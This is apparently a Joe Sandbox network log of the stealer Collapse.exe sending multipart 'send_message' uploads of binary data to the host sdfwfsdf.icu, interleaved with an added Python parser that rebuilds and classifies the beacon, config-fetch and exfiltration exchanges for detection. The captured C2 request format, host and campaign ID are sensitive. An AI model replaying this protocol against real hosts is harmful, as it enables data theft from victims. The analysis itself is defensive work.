                                          2025-03-05 13:57:24 UTC12784OUTData Raw: 2d 2d 51 50 57 32 36 51 30 56 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 61 63 74 22 0d 0a 0d 0a 73 65 6e 64 5f 6d 65 73 73 61 67 65 0d 0a 2d 2d 51 50 57 32 36 51 30 56 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 50 6e 68 71 6f 2d 2d 71 6e 68 74 7a 71 63 72 61 7a 79 67 0d 0a 2d 2d 51 50 57 32 36 51 30 56 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 51 50 57 32 36 51 30 56 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61
                                          Data Ascii: --QPW26Q0VContent-Disposition: form-data; name="act"send_message--QPW26Q0VContent-Disposition: form-data; name="lid"LPnhqo--qnhtzqcrazyg--QPW26Q0VContent-Disposition: form-data; name="pid"2--QPW26Q0VContent-Disposition: form-data
                                           2025-03-05 13:57:25 UTC | 812 | IN | HTTP/1.1 200 OK
                                          Date: Wed, 05 Mar 2025 13:57:25 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Transfer-Encoding: chunked
                                          Connection: close
                                          Vary: Accept-Encoding
                                          cf-cache-status: DYNAMIC
                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=COBho6%2BbyA2h0wY%2BhSGiZ3OQiuZI3BA8SiseVjTZmFIc1hmgrnCewMgImmDYBNZTXcnZQhlBXctFzDp%2Btia49s6jzAilBffIGALHMS5sor7Eh%2BR6AlUq9cDq6LptkiM%3D"}],"group":"cf-nel","max_age":604800}
                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                          Server: cloudflare
                                          CF-RAY: 91ba1f4af92d8095-EWR
                                          alt-svc: h3=":443"; ma=86400
                                          server-timing: cfL4;desc="?proto=TCP&rtt=2086&min_rtt=2057&rtt_var=830&sent=9&recv=17&lost=0&retrans=0&sent_bytes=2826&recv_bytes=13710&delivery_rate=1273440&cwnd=239&unsent_bytes=0&cid=d834ce17ca6380b8&ts=1060&x=0"
                                           2025-03-05 13:57:25 UTC | 20 | IN | Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                          Data Ascii: fok 8.46.123.189
                                           2025-03-05 13:57:25 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                          Data Ascii: 0


                                           Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                           4 | 192.168.2.5 | 49714 | 188.114.97.3 | 443 | 7096 | C:\Users\user\Desktop\Collapse.exe
                                           Timestamp | Bytes transferred | Direction | Data
                                           2025-03-05 13:57:25 UTC | 272 | OUT | POST /api HTTP/1.1
                                          Connection: Keep-Alive
                                          Content-Type: multipart/form-data; boundary=H1A60BTFA8F6
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                          Content-Length: 15050
                                          Host: sdfwfsdf.icu
                                          2025-03-05 13:57:25 UTC15050OUTData Raw: 2d 2d 48 31 41 36 30 42 54 46 41 38 46 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 61 63 74 22 0d 0a 0d 0a 73 65 6e 64 5f 6d 65 73 73 61 67 65 0d 0a 2d 2d 48 31 41 36 30 42 54 46 41 38 46 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 50 6e 68 71 6f 2d 2d 71 6e 68 74 7a 71 63 72 61 7a 79 67 0d 0a 2d 2d 48 31 41 36 30 42 54 46 41 38 46 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 48 31 41 36 30 42 54 46 41 38 46 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73
                                          Data Ascii: --H1A60BTFA8F6Content-Disposition: form-data; name="act"send_message--H1A60BTFA8F6Content-Disposition: form-data; name="lid"LPnhqo--qnhtzqcrazyg--H1A60BTFA8F6Content-Disposition: form-data; name="pid"2--H1A60BTFA8F6Content-Dispos
                                           2025-03-05 13:57:27 UTC | 807 | IN | HTTP/1.1 200 OK
                                          Date: Wed, 05 Mar 2025 13:57:27 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Transfer-Encoding: chunked
                                          Connection: close
                                          Vary: Accept-Encoding
                                          cf-cache-status: DYNAMIC
                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=scrW40PU2jtU5%2BQRoUHfKtbPpdNRcEOclzeMLfJXIRyg8k5zC9z18HMtxNLafD7gEI7Dnz3RIa8qo6dflQxLGQeKiaGae1F3Qu2wtiEt6K5qaSkOanrRxRYRe6AQwtE%3D"}],"group":"cf-nel","max_age":604800}
                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                          Server: cloudflare
                                          CF-RAY: 91ba1f54ad8d43f7-EWR
                                          alt-svc: h3=":443"; ma=86400
                                          server-timing: cfL4;desc="?proto=TCP&rtt=1559&min_rtt=1555&rtt_var=591&sent=10&recv=20&lost=0&retrans=0&sent_bytes=2826&recv_bytes=15980&delivery_rate=1838790&cwnd=167&unsent_bytes=0&cid=299046bebd9d6ad0&ts=1786&x=0"
                                           2025-03-05 13:57:27 UTC | 20 | IN | Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                          Data Ascii: fok 8.46.123.189
                                           2025-03-05 13:57:27 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                          Data Ascii: 0


                                           Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                           5 | 192.168.2.5 | 49715 | 188.114.97.3 | 443 | 7096 | C:\Users\user\Desktop\Collapse.exe
                                           Timestamp | Bytes transferred | Direction | Data
                                           2025-03-05 13:57:28 UTC | 277 | OUT | POST /api HTTP/1.1
                                          Connection: Keep-Alive
                                          Content-Type: multipart/form-data; boundary=ABMGTG0TZ38JKITKD
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                          Content-Length: 20570
                                          Host: sdfwfsdf.icu
                                          2025-03-05 13:57:28 UTC15331OUTData Raw: 2d 2d 41 42 4d 47 54 47 30 54 5a 33 38 4a 4b 49 54 4b 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 61 63 74 22 0d 0a 0d 0a 73 65 6e 64 5f 6d 65 73 73 61 67 65 0d 0a 2d 2d 41 42 4d 47 54 47 30 54 5a 33 38 4a 4b 49 54 4b 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 50 6e 68 71 6f 2d 2d 71 6e 68 74 7a 71 63 72 61 7a 79 67 0d 0a 2d 2d 41 42 4d 47 54 47 30 54 5a 33 38 4a 4b 49 54 4b 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 41 42 4d 47 54 47 30 54 5a 33 38 4a 4b
                                          Data Ascii: --ABMGTG0TZ38JKITKDContent-Disposition: form-data; name="act"send_message--ABMGTG0TZ38JKITKDContent-Disposition: form-data; name="lid"LPnhqo--qnhtzqcrazyg--ABMGTG0TZ38JKITKDContent-Disposition: form-data; name="pid"3--ABMGTG0TZ38JK
                                          2025-03-05 13:57:28 UTC5239OUTData Raw: af 35 13 92 cd 36 8a 95 d9 76 89 c4 4d c9 4d d9 5a b5 da 68 27 0c 46 c7 33 b7 ee 57 14 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 75 6e 20 0a e6 d6 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 ce 0d 46 c1 dc ba 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d6 b9 81 28 98 5b f7 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 3a 37 18 05 73 eb 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 58 e7 06 a2 60 6e dd 4f 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                          Data Ascii: 56vMMZh'F3Wun 4F([:7s~X`nO
                                           2025-03-05 13:57:31 UTC | 813 | IN | HTTP/1.1 200 OK
                                          Date: Wed, 05 Mar 2025 13:57:31 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Transfer-Encoding: chunked
                                          Connection: close
                                          Vary: Accept-Encoding
                                          cf-cache-status: DYNAMIC
                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2F3x5XsBMwI0Vtsc1YTT3I2MvXVW4KmIifcwWE6l2C00K1wZAUMuagGQuPd1IyjIqKGrbNcLhg%2BQOeVfDx9OKHDRc6vk0bR%2BUlbLXf6lZsn6fqxU2f8MeODB%2ButXR5kg%3D"}],"group":"cf-nel","max_age":604800}
                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                          Server: cloudflare
                                          CF-RAY: 91ba1f63693443a6-EWR
                                          alt-svc: h3=":443"; ma=86400
                                          server-timing: cfL4;desc="?proto=TCP&rtt=1604&min_rtt=1599&rtt_var=611&sent=11&recv=25&lost=0&retrans=0&sent_bytes=2827&recv_bytes=21527&delivery_rate=1773997&cwnd=142&unsent_bytes=0&cid=b33cc1053752526a&ts=3740&x=0"
                                           2025-03-05 13:57:31 UTC | 20 | IN | Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                          Data Ascii: fok 8.46.123.189
                                           2025-03-05 13:57:31 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                          Data Ascii: 0


                                           Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                           6 | 192.168.2.5 | 49719 | 188.114.97.3 | 443 | 7096 | C:\Users\user\Desktop\Collapse.exe
                                           Timestamp | Bytes transferred | Direction | Data
                                           2025-03-05 13:57:32 UTC | 269 | OUT | POST /api HTTP/1.1
                                          Connection: Keep-Alive
                                          Content-Type: multipart/form-data; boundary=QAK4EBFCG4
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                          Content-Length: 2686
                                          Host: sdfwfsdf.icu
                                          2025-03-05 13:57:32 UTC2686OUTData Raw: 2d 2d 51 41 4b 34 45 42 46 43 47 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 61 63 74 22 0d 0a 0d 0a 73 65 6e 64 5f 6d 65 73 73 61 67 65 0d 0a 2d 2d 51 41 4b 34 45 42 46 43 47 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 50 6e 68 71 6f 2d 2d 71 6e 68 74 7a 71 63 72 61 7a 79 67 0d 0a 2d 2d 51 41 4b 34 45 42 46 43 47 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 51 41 4b 34 45 42 46 43 47 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66
                                          Data Ascii: --QAK4EBFCG4Content-Disposition: form-data; name="act"send_message--QAK4EBFCG4Content-Disposition: form-data; name="lid"LPnhqo--qnhtzqcrazyg--QAK4EBFCG4Content-Disposition: form-data; name="pid"1--QAK4EBFCG4Content-Disposition: f
                                           2025-03-05 13:57:33 UTC | 813 | IN | HTTP/1.1 200 OK
                                          Date: Wed, 05 Mar 2025 13:57:32 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Transfer-Encoding: chunked
                                          Connection: close
                                          Vary: Accept-Encoding
                                          cf-cache-status: DYNAMIC
                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=fIQY%2FVooHlkscX0S%2FaRwPobnk61p%2BdeMOJ0JhOchLIKHCY70ZMPn2Z4pVzGDvatA%2FlI20FkU0PxRK1MpxnAMV6GYnkj%2B7tSjEZ8F1KTt1oM%2BfK6bySRNtbBcpAtKGIk%3D"}],"group":"cf-nel","max_age":604800}
                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                          Server: cloudflare
                                          CF-RAY: 91ba1f7f1a7bf5f7-EWR
                                          alt-svc: h3=":443"; ma=86400
                                          server-timing: cfL4;desc="?proto=TCP&rtt=1674&min_rtt=1637&rtt_var=640&sent=5&recv=8&lost=0&retrans=0&sent_bytes=2826&recv_bytes=3591&delivery_rate=1783750&cwnd=162&unsent_bytes=0&cid=dde89cd8aafd155a&ts=448&x=0"
                                           2025-03-05 13:57:33 UTC | 20 | IN | Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                          Data Ascii: fok 8.46.123.189
                                           2025-03-05 13:57:33 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                          Data Ascii: 0
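
The sessions above form one check-in sequence against sdfwfsdf.icu from the same PID: an `act=life` beacon answered with `ok`, an `act=receive_message&ver=4.0&lid=...` request answered with a chunked, base64-looking blob, then repeated multipart `send_message` uploads carrying the same `lid` and a `pid` counter, each answered with `ok` followed by an IPv4 address. The `2ok` / `fok 8.46.123.189` / `0` fragments in the Data Ascii rows are chunked-transfer framing with the CRLFs stripped. The Python below is an added example, not part of the Joe Sandbox report and not the malware's own code: it rebuilds the three request/response pairs from sessions 1 to 3 with the CRLFs restored, decodes the chunked replies, parses both body encodings and flags the three-step shape. The `file` part of the multipart body (its name, filename and contents) is an assumption, since the report truncates the upload; the receive_message reply is cut to its first 16 characters; the phase labels are this example's own, not the report's.

```python
"""Parse and classify the LummaC2-style POST /api exchanges dumped above.

Added example; not from the Joe Sandbox report or the malware. Samples are
rebuilt from sessions 1-3 with CRLFs restored. The multipart 'file' part is an
assumption (the report truncates it); the receive_message blob is shortened.
"""
import re
from urllib.parse import parse_qsl

UA = (b"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 "
      b"(KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36")


def build_request(content_type: bytes, body: bytes) -> bytes:
    """Rebuild one POST /api request with the headers seen in the dump."""
    return (b"POST /api HTTP/1.1\r\nConnection: Keep-Alive\r\nContent-Type: " + content_type
            + b"\r\nUser-Agent: " + UA + b"\r\nContent-Length: " + str(len(body)).encode()
            + b"\r\nHost: sdfwfsdf.icu\r\n\r\n" + body)


def build_multipart(boundary: bytes, parts) -> bytes:
    """Assemble a multipart/form-data body from (name, value, filename|None) tuples."""
    out = b""
    for name, value, filename in parts:
        out += b"--" + boundary + b'\r\nContent-Disposition: form-data; name="' + name + b'"'
        if filename:
            out += b'; filename="' + filename + b'"\r\nContent-Type: application/octet-stream'
        out += b"\r\n\r\n" + value + b"\r\n"
    return out + b"--" + boundary + b"--\r\n"


FILE_PAYLOAD = bytes(range(256)) * 4  # constructed stand-in for the uploaded blob (assumption)

# Constructed from sessions 1, 2 and 3: (request bytes, raw chunked response body).
SAMPLE_EXCHANGES = [
    (build_request(b"application/x-www-form-urlencoded", b"act=life"),
     b"2\r\nok\r\n0\r\n\r\n"),                       # dump shows '2ok' then '0'
    (build_request(b"application/x-www-form-urlencoded",
                   b"act=receive_message&ver=4.0&lid=LPnhqo--qnhtzqcrazyg&j="),
     b"10\r\nf3m+YGkkpzhcPRIH\r\n0\r\n\r\n"),     # 0xc29-byte blob cut to 16 bytes
    (build_request(b"multipart/form-data; boundary=QPW26Q0V",
                   build_multipart(b"QPW26Q0V", [
                       (b"act", b"send_message", None),
                       (b"lid", b"LPnhqo--qnhtzqcrazyg", None),
                       (b"pid", b"2", None),
                       (b"file", FILE_PAYLOAD, b"data.bin")])),   # this part is assumed
     b"f\r\nok 8.46.123.189\r\n0\r\n\r\n"),         # dump shows 'fok 8.46.123.189' then '0'
]


def decode_chunked(raw: bytes) -> bytes:
    """Undo chunked transfer encoding: b'2\\r\\nok\\r\\n0\\r\\n\\r\\n' -> b'ok'.
    A capture cut off before the zero-length chunk yields what was received."""
    out, pos = bytearray(), 0
    while True:
        end = raw.find(b"\r\n", pos)
        if end < 0:
            break
        size = int(raw[pos:end].split(b";")[0] or b"0", 16)  # ignore chunk extensions
        if size == 0:
            break
        out += raw[end + 2:end + 2 + size]
        pos = end + 2 + size + 2  # skip the chunk and the CRLF that follows it
    return bytes(out)


def parse_multipart(body: bytes, boundary: bytes) -> dict:
    """Return {field name: raw value}; a filename is stored under '<name>.filename'."""
    fields = {}
    for part in body.split(b"--" + boundary)[1:]:
        if part.startswith(b"--"):  # closing delimiter
            break
        head, _, value = part[2:].partition(b"\r\n\r\n")  # part[2:] drops the leading CRLF
        name = re.search(rb'[;\s]name="([^"]+)"', head)
        if not name:
            continue
        key = name.group(1).decode("latin-1")
        fields[key] = value[:-2] if value.endswith(b"\r\n") else value
        fname = re.search(rb'filename="([^"]*)"', head)
        if fname:
            fields[key + ".filename"] = fname.group(1).decode("latin-1")
    return fields


def parse_request(raw: bytes) -> dict:
    """Split request line, headers and body; decode the body per Content-Type."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")
    method, path, _ = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        key, _, value = line.partition(":")
        headers[key.strip().lower()] = value.strip()
    ctype = headers.get("content-type", "")
    if ctype.startswith("multipart/form-data"):
        boundary = re.search(r"boundary=([^;]+)", ctype).group(1).strip()
        fields = parse_multipart(body, boundary.encode("latin-1"))
    else:
        fields = {k: v.encode("latin-1")
                  for k, v in parse_qsl(body.decode("latin-1"), keep_blank_values=True)}
    return {"method": method, "path": path, "host": headers.get("host", ""), "fields": fields}


def classify(req: dict, response_raw: bytes) -> dict:
    """Map one exchange onto the phases visible in the dump (labels are this example's)."""
    fields = req["fields"]
    act = fields.get("act", b"").decode("latin-1")
    reply = decode_chunked(response_raw)
    rec = {"act": act, "path": req["path"], "host": req["host"],
           "lid": fields.get("lid", b"").decode("latin-1"), "phase": "unknown"}
    if act == "life":
        rec["phase"] = "beacon"          # answered with a bare 'ok'
    elif act == "receive_message":
        rec["phase"] = "config_fetch"    # answered with a base64-looking blob
        rec["blob_bytes"] = len(reply)
    elif act == "send_message":
        rec["phase"] = "exfiltration"
        rec["pid"] = int(fields.get("pid", b"0"))
        rec["payload_bytes"] = len(fields.get("file", b""))
        m = re.fullmatch(r"ok (\d{1,3}(?:\.\d{1,3}){3})", reply.decode("latin-1").strip())
        rec["echoed_ip"] = m.group(1) if m else None   # server answers 'ok <ipv4>'
    return rec


def analyze(exchanges) -> dict:
    """Classify every exchange and test the whole set for the three-step shape."""
    records = [classify(parse_request(req), resp) for req, resp in exchanges]
    lids = {r["lid"] for r in records if r["lid"]}
    single_lid = next(iter(lids)) if len(lids) == 1 else None
    acts = {r["act"] for r in records}
    return {
        "records": records,
        "lid": single_lid,
        "exfil_bytes": sum(r.get("payload_bytes", 0) for r in records),
        # beacon + config fetch + at least one upload, all to /api under one lid
        "lumma_c2_shape": ({"life", "receive_message", "send_message"} <= acts
                           and single_lid is not None
                           and all(r["path"] == "/api" for r in records)),
    }


if __name__ == "__main__":
    result = analyze(SAMPLE_EXCHANGES)
    for r in result["records"]:
        print(r)
    print("lid:", result["lid"], "exfil bytes:", result["exfil_bytes"],
          "LummaC2 shape:", result["lumma_c2_shape"])
```

Running it over the three rebuilt exchanges yields the phases beacon, config_fetch and exfiltration under the single lid `LPnhqo--qnhtzqcrazyg`, with the echoed address 8.46.123.189 extracted from the decoded reply. On real captures, the same shape check works on the decrypted HTTP as exported by a sandbox or a TLS-inspecting proxy; the `Content-Length` values in sessions 3 to 7 (12784 up to 570494 bytes) give the exfiltrated volume per upload even when the file part itself is not recoverable.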


                                           Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                           7 | 192.168.2.5 | 49722 | 188.114.97.3 | 443 | 7096 | C:\Users\user\Desktop\Collapse.exe
                                           Timestamp | Bytes transferred | Direction | Data
                                           2025-03-05 13:57:33 UTC | 269 | OUT | POST /api HTTP/1.1
                                          Connection: Keep-Alive
                                          Content-Type: multipart/form-data; boundary=9ZSKVYPZ
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                          Content-Length: 570494
                                          Host: sdfwfsdf.icu
                                          2025-03-05 13:57:33 UTC15331OUTData Raw: 2d 2d 39 5a 53 4b 56 59 50 5a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 61 63 74 22 0d 0a 0d 0a 73 65 6e 64 5f 6d 65 73 73 61 67 65 0d 0a 2d 2d 39 5a 53 4b 56 59 50 5a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 50 6e 68 71 6f 2d 2d 71 6e 68 74 7a 71 63 72 61 7a 79 67 0d 0a 2d 2d 39 5a 53 4b 56 59 50 5a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 39 5a 53 4b 56 59 50 5a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61
                                          Data Ascii: --9ZSKVYPZContent-Disposition: form-data; name="act"send_message--9ZSKVYPZContent-Disposition: form-data; name="lid"LPnhqo--qnhtzqcrazyg--9ZSKVYPZContent-Disposition: form-data; name="pid"1--9ZSKVYPZContent-Disposition: form-data
                                          2025-03-05 13:57:33 UTC15331OUTData Raw: ea 79 4b fe 8c f1 ff 42 6a d2 97 3d 3b 11 26 a5 fd 2f bf fb 8f 54 fb 79 fd 72 7f ee cf 0f f4 aa f0 40 76 45 9a ee 2c ba c2 4a 2e b2 1a 77 fe 07 50 9a 1e ff bf db 4d fe ef 03 3c 44 07 e0 cc 14 05 5a 09 84 7e 43 58 b0 f1 41 fb 68 46 4d 26 28 8c 77 12 bd d0 d0 6f 17 92 fd 98 fb 33 46 08 e9 4f 65 bd 4e db 11 00 52 8d b4 60 78 7c b0 17 ec 8c 81 1e 7b 43 fa ae ec 3d 3d cd c1 18 77 5a a3 3c ee f8 aa b3 1c ea 72 85 73 c7 6e db bc 05 d4 12 29 01 e1 f6 51 89 c2 4c 5f f3 d8 43 ed 9c 48 3a 3a 89 eb 75 2f 45 f4 08 e7 7a 3b 0a 02 bf 5f 99 4e ee a7 35 4e 9f a2 73 7b 7e 50 43 75 fb bc 89 0b 9b 34 d1 73 63 62 07 d4 05 65 c3 bf 7d 03 48 04 9f 1a 28 cd 4a 3a e7 9c 8e cd d5 42 1c 39 f4 e9 02 b0 ec 57 84 c6 1a 58 3b eb 57 5a 6c 86 22 24 c1 31 13 f9 e1 d0 d9 05 e2 52 94 bf 61
                                          Data Ascii: yKBj=;&/Tyr@vE,J.wPM<DZ~CXAhFM&(wo3FOeNR`x|{C==wZ<rsn)QL_CH::u/Ez;_N5Ns{~PCu4scbe}H(J:B9WX;WZl"$1Ra
                                          2025-03-05 13:57:33 UTC15331OUTData Raw: d4 39 ab 11 6c 8e e2 b2 bf d1 76 6e 08 75 de d0 0f 41 df 25 f8 a4 3a 56 aa 61 e1 97 11 e3 99 7d 49 78 f6 f3 0a 7f 0b 6d 90 56 1a 66 89 a0 e5 15 22 00 5b 0f bb 33 28 cc 7a 00 e8 56 06 ff 9b 64 e7 80 a5 1f 20 b3 10 e4 7e 49 39 78 b6 89 22 c8 75 7b 92 ff df be ed f2 a9 e2 c9 e6 0a 90 00 90 44 de f3 b9 cf 13 07 22 bb 34 64 50 90 00 eb 83 b8 e8 a4 48 07 70 de 09 67 29 8e 48 3b 40 87 42 2f 80 81 c7 d5 4c 8f 62 8b 82 57 cd f9 97 4e dd 9b 87 5d 30 58 93 6d bb 2b bb af 20 6e a8 cb 80 07 98 a5 7b a3 85 69 0e d9 a8 6e 33 38 26 68 36 22 3d 65 48 db 51 c5 58 c6 47 bd f9 ae 9a d0 71 bc c4 47 dc 10 3c f8 30 13 f5 5a a9 58 8f 52 b0 b7 c5 60 67 cf 29 a5 b2 a5 c6 4d 2c 1c f4 f4 a7 77 62 5e ed b2 56 88 28 07 7b 87 19 f8 a4 7d 4a be dc 62 7a 54 09 70 bd 7a 3c 55 c4 b8 95 ba
                                          Data Ascii: 9lvnuA%:Va}IxmVf"[3(zVd ~I9x"u{D"4dPHpg)H;@B/LbWN]0Xm+ n{in38&h6"=eHQXGqG<0ZXR`g)M,wb^V({}JbzTpz<U
                                          2025-03-05 13:57:33 UTC15331OUTData Raw: e9 3a 76 69 2b d9 57 a4 1d a3 f1 a7 0f 4b ec e6 78 2a 88 1d 49 4d 63 79 d4 ee 4e f7 70 76 8a d8 21 b2 69 a1 82 7c 55 2b 72 f5 0c 5d 15 b5 63 4f 6a 62 b2 3a 6b 62 66 be 9a 95 c9 20 4f 34 a4 ff c5 85 0f a1 fa 13 bf 6d d9 0f 32 d2 65 c2 2f 97 09 d4 57 6e 31 d7 47 c6 62 66 f8 a9 ed 84 af 0d 67 bf 6e 76 7c d1 d8 77 4b 92 96 ba f4 2a 2d 3d c4 0c 81 80 a0 98 58 99 02 1b c4 85 6b 0b 28 72 18 04 31 65 c0 55 ac ae 24 44 d4 d2 28 50 7f 68 72 fd fc a8 e9 9e a3 a0 97 1f a3 9a ca 31 cf 07 19 14 ea e5 1f a6 15 e1 5f f5 73 4a ff f4 35 d4 b9 fd 41 1e 74 d5 61 3f ac 67 3d db f3 5e 0c 58 5e 01 96 98 b2 8f 80 2a b9 ee ee 7a 20 43 0d 14 c6 ff 99 5e 96 46 cc b4 04 6d 46 c9 2c e8 0a b9 2a 7d 1d 22 f6 dc fa e1 3b cb 6e d4 d2 73 fe 74 77 f6 73 c6 aa f2 e9 c8 20 b9 4d 1d 00 5c 34
                                          Data Ascii: :vi+WKx*IMcyNpv!i|U+r]cOjb:kbf O4m2e/Wn1Gbfgnv|wK*-=Xk(r1eU$D(Phr1_sJ5Ata?g=^X^*z C^FmF,*}";nstws M\4
